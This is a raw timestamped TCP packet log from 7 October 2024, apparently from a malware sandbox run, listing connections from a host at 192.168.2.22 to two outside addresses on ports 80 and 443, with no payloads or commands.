                                                                                                                                                                                      Oct 7, 2024 07:14:33.636699915 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636714935 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637063026 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637109995 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637123108 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637137890 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637162924 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637176037 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637239933 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637254953 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637281895 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.637295961 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.795573950 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:33.795617104 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.795676947 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:33.800892115 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:33.800904989 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:34.761187077 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:34.761284113 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:34.784064054 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:34.784085989 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:34.785136938 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:34.785207033 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:34.845592022 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:34.891401052 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:35.364336967 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:35.364476919 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.364485979 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:35.364521027 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:35.364562035 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.364562988 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.364581108 CEST4434916314.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:35.364639997 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.367690086 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.367690086 CEST49163443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.667697906 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.667754889 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:35.667814970 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.668334007 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:35.668351889 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:36.657671928 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:36.657733917 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:36.661890030 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:36.661942005 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:36.662338972 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:36.665178061 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:36.711405039 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:37.304371119 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:37.304449081 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:37.304524899 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:37.304742098 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:37.304791927 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:37.304821968 CEST49164443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:37.304837942 CEST4434916414.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:38.045809984 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:38.045897007 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:40.513951063 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:40.514004946 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:40.514079094 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:40.514740944 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:40.514770031 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:41.499428034 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:41.499535084 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:41.503402948 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:41.503418922 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:41.503865957 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:41.517976046 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:41.563425064 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:42.105472088 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:42.105530024 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:42.105631113 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:42.105664015 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:42.106554985 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:42.106611013 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:42.106673002 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:42.487791061 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:42.487844944 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:42.488018036 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:42.488399029 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:42.488429070 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:43.451314926 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:43.451399088 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:43.456593990 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:43.456610918 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:43.457122087 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:43.458129883 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:43.503396988 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.056030035 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.056124926 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.056226015 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:44.056246996 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.096824884 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.096997976 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:44.097038984 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.097167015 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.097626925 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:44.097686052 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:44.097723961 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.097790003 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:44.097809076 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.327620029 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:44.327686071 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:44.327769041 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:44.328043938 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:44.328068018 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:45.486315966 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:45.486687899 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:45.490555048 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:45.490587950 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:45.490988016 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:45.491930008 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:45.539405107 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.101699114 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.101788044 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.101866961 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:46.101928949 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.135941982 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.136053085 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:46.136094093 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.136239052 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.136353016 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:46.136425972 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:46.136454105 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.136483908 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:46.136497974 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.237323999 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:46.237437963 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:46.237564087 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:46.237957954 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:46.237987995 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:47.648732901 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:47.648854017 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:47.657633066 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:47.657665968 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:47.658071995 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:47.658140898 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:47.671972036 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:47.715455055 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:48.287447929 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:48.287589073 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:48.287635088 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:48.287661076 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:48.287679911 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:48.287707090 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:48.319812059 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:48.319849014 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:48.439502001 CEST4916980192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:48.444726944 CEST804916938.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:48.444871902 CEST4916980192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:48.446644068 CEST4916980192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:48.451586962 CEST804916938.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:49.289314032 CEST804916938.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:49.289437056 CEST4916980192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:49.586257935 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:49.591331959 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:49.591449022 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:49.591789007 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:49.596561909 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643018961 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643079996 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643119097 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643151045 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643166065 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643201113 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643223047 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643239021 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643250942 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643273115 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643290997 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643311977 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643347979 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643349886 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643368959 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643404007 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643412113 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643449068 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643469095 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643487930 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643491983 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643536091 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.691876888 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877036095 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877106905 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877422094 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877474070 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877518892 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877558947 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877568960 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877598047 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877612114 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877635002 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877839088 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877867937 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877877951 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877886057 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877926111 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877945900 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877965927 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877975941 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877983093 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877995968 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878559113 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878608942 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878638029 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878657103 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878681898 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878690958 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878725052 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878741980 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878767967 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.878779888 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.879446030 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.879496098 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.879513025 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.879525900 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.879535913 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.879550934 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882488012 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882544041 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882631063 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882672071 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882726908 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882767916 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882895947 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882914066 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882960081 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.882976055 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883001089 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883012056 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883282900 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883328915 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883444071 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883487940 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883600950 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883641005 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883774042 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883816004 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883949995 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.883991003 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884144068 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884186983 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884342909 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884365082 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884385109 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884397030 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884479046 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884495020 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884521961 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.884531975 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.885030985 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.885072947 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.885165930 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.885204077 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.885349989 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.885391951 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887398005 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887414932 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887435913 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887455940 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887455940 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887475014 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887487888 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887523890 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887794971 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887834072 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887842894 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887877941 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887949944 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887984991 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.887990952 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888021946 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888170958 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888207912 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888223886 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888252974 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888386011 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888422966 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888433933 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888472080 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888601065 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888644934 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888715982 CEST804917038.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888756037 CEST4917080192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:50.888819933 CEST804917038.240.41.28192.168.2.22
